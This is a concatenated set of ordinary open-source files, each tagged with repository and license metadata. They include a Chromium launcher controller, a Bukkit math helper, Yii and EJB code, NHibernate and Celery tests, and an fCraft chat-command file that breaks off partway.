            id_to_item_controller_map_.find(item.id);
        if (entry != id_to_item_controller_map_.end() &&
            entry->second->app_id() == *pref_app_id) {
          ++pref_app_id;
          break;
        } else {
          // Stale shortcut ahead of the expected one; remove it and re-visit
          // this index after the model shifts left.
          LauncherItemClosed(item.id);
          --index;
        }
      }
      // If the item wasn't found, that means id_to_item_controller_map_
      // is out of sync.
      DCHECK(index < model_->item_count());
    } else {
      // This app wasn't pinned before, insert a new entry.
      ash::LauncherID id = CreateAppShortcutLauncherItem(*pref_app_id, index);
      index = model_->ItemIndexByID(id);
      ++pref_app_id;
    }
  }

  // Remove any trailing existing items.
  while (index < model_->item_count()) {
    const ash::LauncherItem& item(model_->items()[index]);
    if (item.type == ash::TYPE_APP_SHORTCUT)
      LauncherItemClosed(item.id);
    else
      ++index;
  }

  // Append unprocessed items from the pref to the end of the model.
  for (; pref_app_id != pinned_apps.end(); ++pref_app_id)
    DoPinAppWithID(*pref_app_id);
}
// Persists |behavior| for |root_window|'s display in the per-display pref,
// plus both global prefs when it is the primary display.
void ChromeLauncherControllerPerBrowser::SetShelfAutoHideBehaviorPrefs(
    ash::ShelfAutoHideBehavior behavior,
    aura::RootWindow* root_window) {
  const char* value = NULL;
  switch (behavior) {
    case ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS:
      value = ash::kShelfAutoHideBehaviorAlways;
      break;
    case ash::SHELF_AUTO_HIDE_BEHAVIOR_NEVER:
      value = ash::kShelfAutoHideBehaviorNever;
      break;
    case ash::SHELF_AUTO_HIDE_ALWAYS_HIDDEN:
      // This one should not be a valid preference option for now. We only want
      // to completely hide it when we run app mode.
      NOTREACHED();
      return;
  }

  UpdatePerDisplayPref(
      profile_->GetPrefs(), root_window, prefs::kShelfAutoHideBehavior, value);

  if (root_window == ash::Shell::GetPrimaryRootWindow()) {
    // See comment in |kShelfAlignment| about why we have two prefs here.
    profile_->GetPrefs()->SetString(prefs::kShelfAutoHideBehaviorLocal, value);
    profile_->GetPrefs()->SetString(prefs::kShelfAutoHideBehavior, value);
  }
}
// Applies the persisted auto-hide behavior to each shelf. With per-display
// launchers enabled, every root window is updated from its own pref value;
// otherwise only the primary root window is touched.
void ChromeLauncherControllerPerBrowser::SetShelfAutoHideBehaviorFromPrefs() {
  ash::Shell::RootWindowList root_windows;
  if (ash::Shell::IsLauncherPerDisplayEnabled())
    root_windows = ash::Shell::GetAllRootWindows();
  else
    root_windows.push_back(ash::Shell::GetPrimaryRootWindow());
  for (ash::Shell::RootWindowList::const_iterator iter = root_windows.begin();
       iter != root_windows.end(); ++iter) {
    ash::Shell::GetInstance()->SetShelfAutoHideBehavior(
        GetShelfAutoHideBehavior(*iter), *iter);
  }
}
// Reads the persisted shelf alignment for each root window and applies it.
// No-op unless the launcher-alignment-menu command line switch is present.
// Unrecognized pref values fall back to bottom alignment.
void ChromeLauncherControllerPerBrowser::SetShelfAlignmentFromPrefs() {
  if (!CommandLine::ForCurrentProcess()->HasSwitch(
          switches::kShowLauncherAlignmentMenu))
    return;
  ash::Shell::RootWindowList root_windows;
  if (ash::Shell::IsLauncherPerDisplayEnabled())
    root_windows = ash::Shell::GetAllRootWindows();
  else
    root_windows.push_back(ash::Shell::GetPrimaryRootWindow());
  for (ash::Shell::RootWindowList::const_iterator iter = root_windows.begin();
       iter != root_windows.end(); ++iter) {
    // See comment in |kShelfAlignment| as to why we consider two prefs.
    const std::string alignment_value(
        GetPrefForRootWindow(profile_->GetPrefs(),
                             *iter,
                             prefs::kShelfAlignmentLocal,
                             prefs::kShelfAlignment));
    ash::ShelfAlignment alignment = ash::SHELF_ALIGNMENT_BOTTOM;
    if (alignment_value == ash::kShelfAlignmentLeft)
      alignment = ash::SHELF_ALIGNMENT_LEFT;
    else if (alignment_value == ash::kShelfAlignmentRight)
      alignment = ash::SHELF_ALIGNMENT_RIGHT;
    else if (alignment_value == ash::kShelfAlignmentTop)
      alignment = ash::SHELF_ALIGNMENT_TOP;
    ash::Shell::GetInstance()->SetShelfAlignment(alignment, *iter);
  }
}
// Convenience wrapper: restores both persisted shelf settings at once.
void ChromeLauncherControllerPerBrowser::SetShelfBehaviorsFromPrefs() {
  SetShelfAutoHideBehaviorFromPrefs();
  SetShelfAlignmentFromPrefs();
}
// Returns the most recently active WebContents associated with |app_id|, or
// NULL when the app has no entry. An existing entry is expected to hold at
// least one WebContents (enforced by the DCHECK).
WebContents* ChromeLauncherControllerPerBrowser::GetLastActiveWebContents(
    const std::string& app_id) {
  AppIDToWebContentsListMap::const_iterator i =
      app_id_to_web_contents_list_.find(app_id);
  if (i == app_id_to_web_contents_list_.end())
    return NULL;
  DCHECK_GT(i->second.size(), 0u);
  return *i->second.begin();
}
// Inserts a launcher item for |controller| at |index|, registering the
// controller under a freshly allocated launcher id. |status| is overridden
// to ACTIVE/RUNNING when the app already has an open tab. The app icon is
// fetched asynchronously after the item is added.
ash::LauncherID ChromeLauncherControllerPerBrowser::InsertAppLauncherItem(
    LauncherItemController* controller,
    const std::string& app_id,
    ash::LauncherItemStatus status,
    int index) {
  ash::LauncherID id = model_->next_id();
  DCHECK(!HasItemController(id));
  DCHECK(controller);
  // Register the controller before building the item so the id is resolvable.
  id_to_item_controller_map_[id] = controller;
  controller->set_launcher_id(id);
  ash::LauncherItem item;
  item.type = controller->GetLauncherItemType();
  item.is_incognito = false;
  // Placeholder icon; replaced once FetchImage() below completes.
  item.image = extensions::IconsInfo::GetDefaultAppIcon();
  WebContents* active_tab = GetLastActiveWebContents(app_id);
  if (active_tab) {
    Browser* browser = chrome::FindBrowserWithWebContents(active_tab);
    DCHECK(browser);
    if (browser->window()->IsActive())
      status = ash::STATUS_ACTIVE;
    else
      status = ash::STATUS_RUNNING;
  }
  item.status = status;
  model_->AddAt(index, item);
  app_icon_loader_->FetchImage(app_id);
  return id;
}
// Returns true when a LauncherItemController has been registered for |id|.
bool ChromeLauncherControllerPerBrowser::HasItemController(
    ash::LauncherID id) const {
  return id_to_item_controller_map_.count(id) != 0;
}
// Builds an AppShortcutLauncherItemController for |app_id| and inserts a
// closed shortcut item for it at |index| in the launcher model, returning
// the new item's launcher id.
ash::LauncherID
ChromeLauncherControllerPerBrowser::CreateAppShortcutLauncherItem(
    const std::string& app_id,
    int index) {
  AppShortcutLauncherItemController* item_controller =
      new AppShortcutLauncherItemController(app_id, this);
  return InsertAppLauncherItem(item_controller, app_id, ash::STATUS_CLOSED,
                               index);
}
// Test hook: replaces the AppTabHelper (takes ownership of |helper|).
void ChromeLauncherControllerPerBrowser::SetAppTabHelperForTest(
    AppTabHelper* helper) {
  app_tab_helper_.reset(helper);
}
// Test hook: replaces the AppIconLoader (takes ownership of |loader|).
void ChromeLauncherControllerPerBrowser::SetAppIconLoaderForTest(
    extensions::AppIconLoader* loader) {
  app_icon_loader_.reset(loader);
}
// Test-only accessor: returns the app id registered for launcher item |id|.
// Uses find() instead of operator[] so that an unknown id does not silently
// default-insert a NULL controller into the map and then dereference it.
const std::string&
ChromeLauncherControllerPerBrowser::GetAppIdFromLauncherIdForTest(
    ash::LauncherID id) {
  IDToItemControllerMap::const_iterator entry =
      id_to_item_controller_map_.find(id);
  DCHECK(entry != id_to_item_controller_map_.end());
  return entry->second->app_id();
}
| codenote/chromium-test | chrome/browser/ui/ash/launcher/chrome_launcher_controller_per_browser.cc | C++ | bsd-3-clause | 47,718 |
package me.michidk.zsurvivalgames.utils;
import org.bukkit.Bukkit;
import org.bukkit.Location;
import org.bukkit.entity.Player;
import java.util.ArrayList;
import java.util.List;
/**
* Created with IntelliJ IDEA.
* User: ml
* Date: 03.09.13
* Time: 13:33
* To change this template use File | Settings | File Templates.
*/
public class MathHelper {
    /**
     * Collects the block locations of a circle/cylinder (or sphere) of
     * radius {@code r} centred on {@code loc}.
     *
     * @param loc    centre of the shape
     * @param r      radius in blocks
     * @param h      column height, used only when {@code sphere} is false
     * @param hollow when true, only the outer shell (ring) is returned
     * @param sphere when true, a full sphere is generated instead of a
     *               vertical cylinder of height {@code h}
     * @param plus_y vertical offset added to every returned location
     * @return list of locations inside the requested shape
     */
    public static List<Location> getCircleLocs(Location loc, Integer r, Integer h, Boolean hollow, Boolean sphere, int plus_y) {
        List<Location> circleblocks = new ArrayList<>();
        int cx = loc.getBlockX();
        int cy = loc.getBlockY();
        int cz = loc.getBlockZ();
        for (int x = cx - r; x <= cx + r; x++) {
            for (int z = cz - r; z <= cz + r; z++) {
                for (int y = (sphere ? cy - r : cy); y < (sphere ? cy + r : cy + h); y++) {
                    // Squared distance from the centre (no sqrt needed); the
                    // vertical term only contributes for spheres.
                    double dist = (cx - x) * (cx - x) + (cz - z) * (cz - z) + (sphere ? (cy - y) * (cy - y) : 0);
                    // Inside the outer radius, and (when hollow) outside r-1.
                    if (dist < r * r && !(hollow && dist < (r - 1) * (r - 1))) {
                        circleblocks.add(new Location(loc.getWorld(), x, y + plus_y, z));
                    }
                }
            }
        }
        return circleblocks;
    }
    /**
     * Despite the name, returns the ratio {@code now / max} rounded to two
     * decimal places (range 0.0 to 1.0), not a value between 0 and 100.
     */
    public static double getPercentage(int now, int max) {
        return Math.round(((double) now / (double) max) * 100D) / 100D;
    }
    /**
     * Shows {@code now} as the XP level and the remaining fraction
     * {@code 1 - now/max} as the XP bar progress for player {@code p}.
     */
    public static void setXPProgress(Player p, int now, int max) {
        p.setLevel(now);
        p.setExp(1 - (float) (getPercentage(now, max)));
    }
    /** Applies {@link #setXPProgress(Player, int, int)} to all online players. */
    public static void setXPProgress(int now, int max) {
        for (Player p : Bukkit.getOnlinePlayers()) {
            setXPProgress(p, now, max);
        }
    }
    /** Converts an angle in radians to degrees, narrowed to a float. */
    public static float toDegree(double angle) {
        return (float) Math.toDegrees(angle);
    }
}
| FuseMCNetwork/ZSurvivalGames | src/main/java/me/michidk/zsurvivalgames/utils/MathHelper.java | Java | bsd-3-clause | 1,791 |
<?php
namespace DevGroup\DeferredTasks\Tests;
/**
 * Minimal PHPUnit smoke test verifying the test suite bootstraps correctly.
 */
class ExampleTest extends \PHPUnit_Framework_TestCase
{
    /** Trivial sanity assertion; passes as long as PHPUnit itself works. */
    public function testExample()
    {
        $this->assertEquals('foo', 'foo');
    }
}
| DevGroup-ru/yii2-deferred-tasks | tests/ExampleTest.php | PHP | bsd-3-clause | 195 |
#include <crtdbg.h>
#include "stdafx.h"
#include <et/core/tools.h>
#include <et/gui/fontgen.h>
using namespace et;
using namespace et::gui;
const int maxFontSize = 128;
const int maxFontOffset = 32;
// Prints command line usage (executable name plus the supported options)
// to stdout.
void displayHelp(_TCHAR* argv[])
{
	std::cout << "Using: " << std::endl
		<< getFileName(argv[0]) << std::endl
		<< " -out OUTFILENAME" << std::endl
		<< " -face FONTFACE" << std::endl
		<< " -size FONTSIZE" << std::endl
		<< " -offset CHAROFFSET" << std::endl;
}
// Entry point: parses -out/-face/-size/-offset options, validates ranges and
// invokes the FontGenerator. Returns 0 in all cases (errors are reported on
// stdout only).
int _tmain(int argc, _TCHAR* argv[])
{
	_CrtSetDbgFlag(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF);
	// Defaults used when the corresponding option is omitted.
	std::string fontFace = "Tahoma";
	std::string fontSize = "12";
	std::string outFile = "";
	std::string fontOffset = "0";
	// Every option requires a value, so a valid command line has an odd
	// argument count (program name + option/value pairs).
	if ((argc == 1) || (argc % 2 == 0))
	{
		displayHelp(argv);
		return 0;
	}
	// NOTE(review): strcmp on _TCHAR* assumes a non-Unicode build; confirm
	// the project does not define _UNICODE.
	for (int i = 1; i < argc; ++i)
	{
		if (strcmp(argv[i], "-help") == 0)
		{
			displayHelp(argv);
			return 0;
		}
		else if (strcmp(argv[i], "-out") == 0)
		{
			if (++i >= argc) break;
			outFile = argv[i];
		}
		else if (strcmp(argv[i], "-face") == 0)
		{
			if (++i >= argc) break;
			fontFace = argv[i];
		}
		else if (strcmp(argv[i], "-size") == 0)
		{
			if (++i >= argc) break;
			fontSize = argv[i];
		}
		else if (strcmp(argv[i], "-offset") == 0)
		{
			if (++i >= argc) break;
			fontOffset = argv[i];
		}
	}
	// Default the output file name to the font face.
	if (outFile.size() == 0)
		outFile = fontFace;
	FontGenerator gen;
	gen.setFontFace(fontFace);
	gen.setOutputFile(outFile);
	int size = strToInt(fontSize);
	if ((size < 0) || (size > maxFontSize))
	{
		// Message fixed to describe the actual accepted range [0, maxFontSize].
		std::cout << "Font size is not valid. Should be between 0 and " << maxFontSize << std::endl;
		return 0;
	}
	gen.setSize(size);
	int offset = strToInt(fontOffset);
	if ((offset < 0) || (offset > maxFontOffset))
	{
		// Bug fix: this message previously printed maxFontSize instead of
		// maxFontOffset, and misdescribed the accepted range [0, maxFontOffset].
		std::cout << "Font offset is not valid. Should be between 0 and " << maxFontOffset << std::endl;
		return 0;
	}
	gen.setOffset(static_cast<float>(offset));
	std::cout << "Generating font: " << fontFace << ", " << fontSize << std::endl;
	std::cout.flush();
	switch (gen.generate())
	{
	case FontGeneratorResult_OutputFileFailed:
		{
			std::cout << "Output file failed to write." << std::endl;
			break;
		}
	case FontGeneratorResult_OutputFileNotDefined:
		{
			std::cout << "Output file is not defined." << std::endl;
			break;
		}
	case FontGeneratorResult_Success:
		{
			std::cout << "Success" << std::endl;
			break;
		}
	default:
		{
			std::cout << "???" << std::endl;
		}
	}
	return 0;
}
| sergeyreznik/et-engine | tools/FontGen/main.cpp | C++ | bsd-3-clause | 2,573 |
package ru.evgeniyosipov.facshop.store.ejb;
import ru.evgeniyosipov.facshop.entity.Administrator;
import ru.evgeniyosipov.facshop.entity.Groups;
import javax.ejb.Stateless;
import javax.persistence.EntityManager;
import javax.persistence.PersistenceContext;
import javax.persistence.Query;
import ru.evgeniyosipov.facshop.entity.Person;
/**
 * Stateless session bean managing {@link Administrator} entities and their
 * membership in the ADMINS group.
 */
@Stateless
public class AdministratorBean extends AbstractFacade<Administrator> {
    @PersistenceContext(unitName = "facshopPU")
    private EntityManager em;
    // Set by remove(): true when removal was refused because the target was
    // the only remaining administrator.
    private boolean lastAdministrator;
    @Override
    protected EntityManager getEntityManager() {
        return em;
    }
    /**
     * Looks up a person by e-mail via the Person.findByEmail named query.
     *
     * @return the matching Person, or null when no account uses the address
     */
    public Person getAdministratorByEmail(String email) {
        Query createNamedQuery = getEntityManager().createNamedQuery("Person.findByEmail");
        createNamedQuery.setParameter("email", email);
        if (createNamedQuery.getResultList().size() > 0) {
            return (Person) createNamedQuery.getSingleResult();
        } else {
            return null;
        }
    }
    public AdministratorBean() {
        super(Administrator.class);
    }
    /**
     * Persists {@code admin} and wires the bidirectional association with the
     * ADMINS group before saving both sides.
     */
    @Override
    public void create(Administrator admin) {
        Groups adminGroup = (Groups) em.createNamedQuery("Groups.findByName")
                .setParameter("name", "ADMINS")
                .getSingleResult();
        admin.getGroupsList().add(adminGroup);
        adminGroup.getPersonList().add(admin);
        em.persist(admin);
        em.merge(adminGroup);
    }
    // NOTE: method name misspelling ("Admimistrator") is preserved because it
    // is part of the bean's public interface.
    public boolean isLastAdmimistrator() {
        return lastAdministrator;
    }
    /**
     * Removes {@code admin} from the ADMINS group and deletes the entity,
     * unless it is the last administrator; in that case nothing is deleted
     * and {@link #isLastAdmimistrator()} reports true afterwards.
     */
    @Override
    public void remove(Administrator admin) {
        Groups adminGroup = (Groups) em.createNamedQuery("Groups.findByName")
                .setParameter("name", "ADMINS")
                .getSingleResult();
        if (adminGroup.getPersonList().size() > 1) {
            adminGroup.getPersonList().remove(admin);
            em.remove(em.merge(admin));
            em.merge(adminGroup);
            lastAdministrator = false;
        } else {
            lastAdministrator = true;
        }
    }
}
| evgeniyosipov/facshop | facshop-store/src/main/java/ru/evgeniyosipov/facshop/store/ejb/AdministratorBean.java | Java | bsd-3-clause | 2,075 |
/**
* Keydown
*
*/
module.exports = function() {
/*
* this swallows backspace keys on any non-input element.
* stops backspace -> back
*/
var rx = /INPUT|SELECT|TEXTAREA/i;
$('body').bind("keydown keypress", function(e) {
var key = e.keyCode || e.which;
if( key == 8) { // 8 == backspace or ENTER
if(!rx.test(e.target.tagName) || e.target.disabled || e.target.readOnly ){
e.preventDefault();
}
} else if(key == 13) {
}
});
};
| vulcan-estudios/bsk | src/app/helpers/events/keypress/backspace.js | JavaScript | bsd-3-clause | 552 |
<?php
use yii\helpers\Html;
use yii\grid\GridView;
/* @var $this yii\web\View */
/* @var $searchModel app\modules\autoparts\models\PartOverSearch */
/* @var $dataProvider yii\data\ActiveDataProvider */
$this->title = 'Part Overs';
$this->params['breadcrumbs'][] = $this->title;
// View: lists PartOver records in a filterable GridView with create/upload
// action buttons (button labels are Russian and intentionally untouched).
?>
<div class="part-over-index">
    <h1><?= Html::encode($this->title) ?></h1>
    <?php // echo $this->render('_search', ['model' => $searchModel]); ?>
    <p>
        <?= Html::a('Создать запись', ['create'], ['class' => 'btn btn-success']) ?>
        <?= Html::a('Загрузить CSV файл', ['upload'], ['class' => 'btn btn-primary']) ?>
    </p>
    <?= GridView::widget([
        'dataProvider' => $dataProvider,
        'filterModel' => $searchModel,
        'columns' => [
            ['class' => 'yii\grid\SerialColumn'],
            'code',
            'name',
            'manufacture',
            'price',
            'quantity',
            'date_update',
            'flagpostav',
            // 'srokmin',
            // 'srokmax',
            // 'lotquantity',
            // 'pricedate',
            // 'skladid',
            // 'sklad',
            // 'flagpostav',
            ['class' => 'yii\grid\ActionColumn'],
        ],
    ]); ?>
</div>
| kd-brinex/kd | modules/autoparts/views/over/index.php | PHP | bsd-3-clause | 1,271 |
using System;
using System.Linq;
using System.Linq.Expressions;
using FluentNHibernate.Automapping.TestFixtures;
using FluentNHibernate.Conventions.Helpers.Builders;
using FluentNHibernate.Conventions.Instances;
using FluentNHibernate.Mapping;
using FluentNHibernate.MappingModel;
using FluentNHibernate.MappingModel.Identity;
using NUnit.Framework;
namespace FluentNHibernate.Testing.ConventionsTests.OverridingFluentInterface
{
[TestFixture]
public class ManyToOneConventionTests
{
private PersistenceModel model;
private IMappingProvider mapping;
private Type mappingType;
[SetUp]
public void CreatePersistenceModel()
{
model = new PersistenceModel();
}
[Test]
public void AccessShouldntBeOverwritten()
{
Mapping(x => x.Access.Field());
Convention(x => x.Access.Property());
VerifyModel(x => x.Access.ShouldEqual("field"));
}
[Test]
public void CascadeShouldntBeOverwritten()
{
Mapping(x => x.Cascade.All());
Convention(x => x.Cascade.None());
VerifyModel(x => x.Cascade.ShouldEqual("all"));
}
[Test]
public void ClassShouldntBeOverwritten()
{
Mapping(x => x.Class(typeof(string)));
Convention(x => x.CustomClass(typeof(int)));
VerifyModel(x => x.Class.GetUnderlyingSystemType().ShouldEqual(typeof(string)));
}
[Test]
public void ColumnShouldntBeOverwritten()
{
Mapping(x => x.Column("name"));
Convention(x => x.Column("xxx"));
VerifyModel(x => x.Columns.First().Name.ShouldEqual("name"));
}
[Test]
public void FetchShouldntBeOverwritten()
{
Mapping(x => x.Fetch.Join());
Convention(x => x.Fetch.Select());
VerifyModel(x => x.Fetch.ShouldEqual("join"));
}
[Test]
public void IndexShouldntBeOverwritten()
{
Mapping(x => x.Index("index"));
Convention(x => x.Index("value"));
VerifyModel(x => x.Columns.First().Index.ShouldEqual("index"));
}
[Test]
public void InsertShouldntBeOverwritten()
{
Mapping(x => x.Insert());
Convention(x => x.Not.Insert());
VerifyModel(x => x.Insert.ShouldBeTrue());
}
[Test]
public void LazyShouldntBeOverwritten()
{
Mapping(x => x.LazyLoad());
Convention(x => x.Not.LazyLoad());
VerifyModel(x => x.Lazy.ShouldEqual(true));
}
[Test]
public void NotFoundShouldntBeOverwritten()
{
Mapping(x => x.NotFound.Exception());
Convention(x => x.NotFound.Ignore());
VerifyModel(x => x.NotFound.ShouldEqual("exception"));
}
[Test]
public void NullableShouldntBeOverwritten()
{
Mapping(x => x.Nullable());
Convention(x => x.Not.Nullable());
VerifyModel(x => x.Columns.First().NotNull.ShouldBeFalse());
}
[Test]
public void PropertyRefShouldntBeOverwritten()
{
Mapping(x => x.PropertyRef("ref"));
Convention(x => x.PropertyRef("xxx"));
VerifyModel(x => x.PropertyRef.ShouldEqual("ref"));
}
[Test]
public void ReadOnlyShouldntBeOverwritten()
{
Mapping(x => x.ReadOnly());
Convention(x => x.Not.ReadOnly());
VerifyModel(x =>
{
x.Insert.ShouldBeFalse();
x.Update.ShouldBeFalse();
});
}
[Test]
public void UniqueShouldntBeOverwritten()
{
Mapping(x => x.Unique());
Convention(x => x.Not.Unique());
VerifyModel(x => x.Columns.First().Unique.ShouldBeTrue());
}
[Test]
public void UniqueKeyShouldntBeOverwritten()
{
Mapping(x => x.UniqueKey("key"));
Convention(x => x.UniqueKey("xxx"));
VerifyModel(x => x.Columns.First().UniqueKey.ShouldEqual("key"));
}
[Test]
public void UpdateShouldntBeOverwritten()
{
Mapping(x => x.Update());
Convention(x => x.Not.Update());
VerifyModel(x => x.Update.ShouldBeTrue());
}
[Test]
public void ForeignKeyShouldntBeOverwritten()
{
Mapping(x => x.ForeignKey("key"));
Convention(x => x.ForeignKey("xxx"));
VerifyModel(x => x.ForeignKey.ShouldEqual("key"));
}
#region Helpers
private void Convention(Action<IManyToOneInstance> convention)
{
model.Conventions.Add(new ReferenceConventionBuilder().Always(convention));
}
private void Mapping(Action<ManyToOnePart<ExampleParentClass>> mappingDefinition)
{
var classMap = new ClassMap<ExampleClass>();
var map = classMap.References(x => x.Parent);
mappingDefinition(map);
mapping = classMap;
mappingType = typeof(ExampleClass);
}
private void VerifyModel(Action<ManyToOneMapping> modelVerification)
{
model.Add(mapping);
var generatedModels = model.BuildMappings();
var modelInstance = generatedModels
.First(x => x.Classes.FirstOrDefault(c => c.Type == mappingType) != null)
.Classes.First()
.References.First();
modelVerification(modelInstance);
}
#endregion
}
} | MiguelMadero/fluent-nhibernate | src/FluentNHibernate.Testing/ConventionsTests/OverridingFluentInterface/ManyToOneConventionTests.cs | C# | bsd-3-clause | 6,014 |
from __future__ import unicode_literals
from celery_longterm_scheduler import get_scheduler
from celery_longterm_scheduler.conftest import CELERY
import mock
import pendulum
@CELERY.task
def echo(arg):
    """Trivial Celery task fixture: returns its argument unchanged."""
    return arg
def test_should_store_all_arguments_needed_for_send_task(celery_worker):
    """Scheduling with an eta must capture exactly the arguments that a
    normal ``apply_async()`` would pass to ``send_task()``."""
    # Cannot do this with a Mock, since they (technically correctly)
    # differentiate recording calls between args and kw, so a call
    # `send_task(1, 2, 3)` is not considered equal to
    # `send_task(1, args=2, kwargs=3)`, although semantically it is the same.
    def record_task(
            name, args=None, kwargs=None, countdown=None, eta=None,
            task_id=None, producer=None, connection=None, router=None,
            result_cls=None, expires=None, publisher=None, link=None,
            link_error=None, add_to_parent=True, group_id=None, retries=0,
            chord=None, reply_to=None, time_limit=None, soft_time_limit=None,
            root_id=None, parent_id=None, route_name=None, shadow=None,
            chain=None, task_type=None, **options):
        # Normalize every parameter into one dict so both call styles
        # compare equal.
        options.update(dict(
            args=args, kwargs=kwargs, countdown=countdown,
            eta=eta, task_id=task_id, producer=producer, connection=connection,
            router=router, result_cls=result_cls, expires=expires,
            publisher=publisher, link=link, link_error=link_error,
            add_to_parent=add_to_parent, group_id=group_id, retries=retries,
            chord=chord, reply_to=reply_to, time_limit=time_limit,
            soft_time_limit=soft_time_limit, root_id=root_id,
            parent_id=parent_id, route_name=route_name, shadow=shadow,
            chain=chain, task_type=task_type
        ))
        calls.append((name, options))
    calls = []
    with mock.patch.object(CELERY, 'send_task', new=record_task):
        # First call: scheduled via eta, then replayed from the backend.
        result = echo.apply_async(('foo',), eta=pendulum.now())
        task = get_scheduler(CELERY).backend.get(result.id)
        args = task[0]
        kw = task[1]
        # schedule() always generates an ID itself (to reuse it for the
        # scheduler storage), while the normal apply_async() defers that to
        # send_task(). We undo this here for comparison purposes.
        kw['task_id'] = None
        CELERY.send_task(*args, **kw)
        scheduled_call = calls[0]
        # Second call: a plain apply_async() for comparison.
        echo.apply_async(('foo',))
        normal_call = calls[1]
        # Special edge case, see Task._schedule() for an explanation
        normal_call[1]['result_cls'] = None
        assert scheduled_call == normal_call
def test_should_bypass_if_no_eta_given():
    """``apply_async()`` must only go through the long-term scheduler when an
    eta is actually supplied; omitted or ``None`` falls through to Celery."""
    with mock.patch(
            'celery_longterm_scheduler.task.Task._schedule') as schedule:
        result = echo.apply_async(('foo',))
        assert schedule.call_count == 0
        result.get()  # Be careful about test isolation
        result = echo.apply_async(('foo',), eta=None)
        assert schedule.call_count == 0
        result.get()  # Be careful about test isolation
        echo.apply_async(('foo',), eta=pendulum.now())
        assert schedule.call_count == 1
| ZeitOnline/celery_longterm_scheduler | src/celery_longterm_scheduler/tests/test_task.py | Python | bsd-3-clause | 3,059 |
<?php
// Yii2 database connection component configuration.
return [
    'class' => 'yii\db\Connection',
    'dsn' => 'mysql:host=localhost;dbname=yii2basic',
    'username' => 'root',
    // NOTE(review): credentials are hard-coded and committed; consider moving
    // them to an untracked local config file or environment variables.
    'password' => 'mariadb',
    'charset' => 'utf8',
];
| hrydi/yii_ | config/db.php | PHP | bsd-3-clause | 189 |
/**
* Copyright (c) 2009-2015, rultor.com
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met: 1) Redistributions of source code must retain the above
* copyright notice, this list of conditions and the following
* disclaimer. 2) Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution. 3) Neither the name of the rultor.com nor
* the names of its contributors may be used to endorse or promote
* products derived from this software without specific prior written
* permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT
* NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
* FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
* THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.rultor.agents.github;
import com.jcabi.aspects.Immutable;
import com.jcabi.github.Comment;
import java.io.IOException;
import java.net.URI;
/**
 * Question: parses a GitHub comment into a request for the agent to execute.
 *
 * @author Yegor Bugayenko (yegor@teamed.io)
 * @version $Id$
 * @since 1.3
 */
@Immutable
public interface Question {
    /**
     * Null-object implementation: always answers with {@link Req#EMPTY}.
     */
    Question EMPTY = new Question() {
        @Override
        public Req understand(final Comment.Smart comment, final URI home) {
            return Req.EMPTY;
        }
    };
    /**
     * Understand the comment and return the request it encodes.
     * @param comment The comment
     * @param home Home URI of the daemon
     * @return Request (or Req.EMPTY if nothing found)
     * @throws IOException If fails
     */
    Req understand(Comment.Smart comment, URI home) throws IOException;
}
| joansmith/rultor | src/main/java/com/rultor/agents/github/Question.java | Java | bsd-3-clause | 2,379 |
// Copyright 2009-2013 Matvei Stefarov <me@matvei.org>
using System;
using System.Collections.Generic;
using System.Linq;
namespace fCraft {
static class ChatCommands {
        /// <summary> Registers every chat-related command with the CommandManager.
        /// Called once during server startup. </summary>
        public static void Init() {
            CommandManager.RegisterCommand( CdSay );
            CommandManager.RegisterCommand( CdStaff );
            CommandManager.RegisterCommand( CdIgnore );
            CommandManager.RegisterCommand( CdUnignore );
            CommandManager.RegisterCommand( CdMe );
            CommandManager.RegisterCommand( CdRoll );
            CommandManager.RegisterCommand( CdDeafen );
            CommandManager.RegisterCommand( CdClear );
            CommandManager.RegisterCommand( CdTimer );
            CommandManager.RegisterCommand( CdReply );
        }
#region Reply
        /// <summary> Descriptor for /Reply (alias /re). </summary>
        static readonly CommandDescriptor CdReply = new CommandDescriptor {
            Name = "Reply",
            Aliases = new[] {"re"},
            Category = CommandCategory.Chat,
            Permissions = new[] {Permission.Chat},
            IsConsoleSafe = true,
            UsableByFrozenPlayers = true,
            Usage = "/Re <Message>",
            Help = "Replies to the last message that was sent TO you. " +
                   "To follow up on the last message that YOU sent, use &H@-&S instead.",
            Handler = ReplyHandler
        };
        /// <summary> Handles /Reply: sends a PM back to whoever last messaged
        /// the player, with special handling for deaf, ignoring, and hidden
        /// recipients. </summary>
        static void ReplyHandler( Player player, CommandReader cmd ) {
            string messageText = cmd.NextAll();
            if( messageText.Length == 0 ) {
                player.Message( "Reply: No message to send!" );
                return;
            }
            string targetName = player.lastPrivateMessageSender;
            if( targetName != null ) {
                Player targetPlayer = Server.FindPlayerExact( player,
                                                              targetName,
                                                              SearchOptions.IncludeHidden );
                if( targetPlayer != null ) {
                    if( player.CanSee( targetPlayer ) ) {
                        if( targetPlayer.IsDeaf ) {
                            player.Message( "Cannot PM {0}&S: they are currently deaf.", targetPlayer.ClassyName );
                        } else if( targetPlayer.IsIgnoring( player.Info ) ) {
                            player.Message( "&WCannot PM {0}&W: you are ignored.", targetPlayer.ClassyName );
                        } else {
                            Chat.SendPM( player, targetPlayer, messageText );
                            player.MessageNow( "&Pto {0}: {1}", targetPlayer.Name, messageText );
                        }
                    } else {
                        // Target is online but hidden from the sender: pretend
                        // they are offline, yet still deliver the PM if the
                        // hidden player can hear, compensating the sender's
